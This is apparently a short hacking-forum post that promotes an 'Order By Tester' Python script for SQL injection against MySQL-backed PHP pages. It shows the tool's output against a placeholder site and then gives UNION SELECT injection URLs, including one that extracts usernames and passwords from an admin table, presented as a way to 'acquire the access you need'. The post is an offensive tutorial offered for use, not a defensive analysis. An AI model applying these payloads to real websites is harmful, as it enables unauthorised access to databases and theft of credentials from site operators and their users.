Order By Tester

This is a simple tool for testing the column length in MySQL databases. It will increment by 1 until it finds the error and then shows you the correct length.

It is available from here. (registration required - I advise you do and regularly check).  It will also be available from the main site   http://darkc0de.com

In this example you can see that:

http://www.somesite.com/html/content.php?id= gives the error:

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /var/www/vhosts/somesite/httpdocs/html/content.php on line 24

So we set the change the error setting in the python script to mysql_fetch_assoc()

Note: - Do not use "Warning:", its in bold, so html code would have messed it up

The script when run will increment until it gets this error then subtracts the column by 1.

d3hydr8@linuxbox:~> python orderby.py www.somesite.com/html/content.php?id=
[+] Testing: 1
[+] Testing: 2
[+] Testing: 3
[+] Testing: 4
[+] Testing: 5
 
        [!] Column Length Found: 4
        [!] Site: http://www.somesite.com/html/content.php?id=-1+order+by+4/*

Using the usual UNION SELECT statement with the above information gives you the required syntax to acquire the access you need:

http://www.somesite.com/html/content.php?id=-1+union+all+select+1,2,3,4/* or the usual

http://www.somesite.com/html/content.phpid=1+union+all+select+1,username,password,4+

from+admin--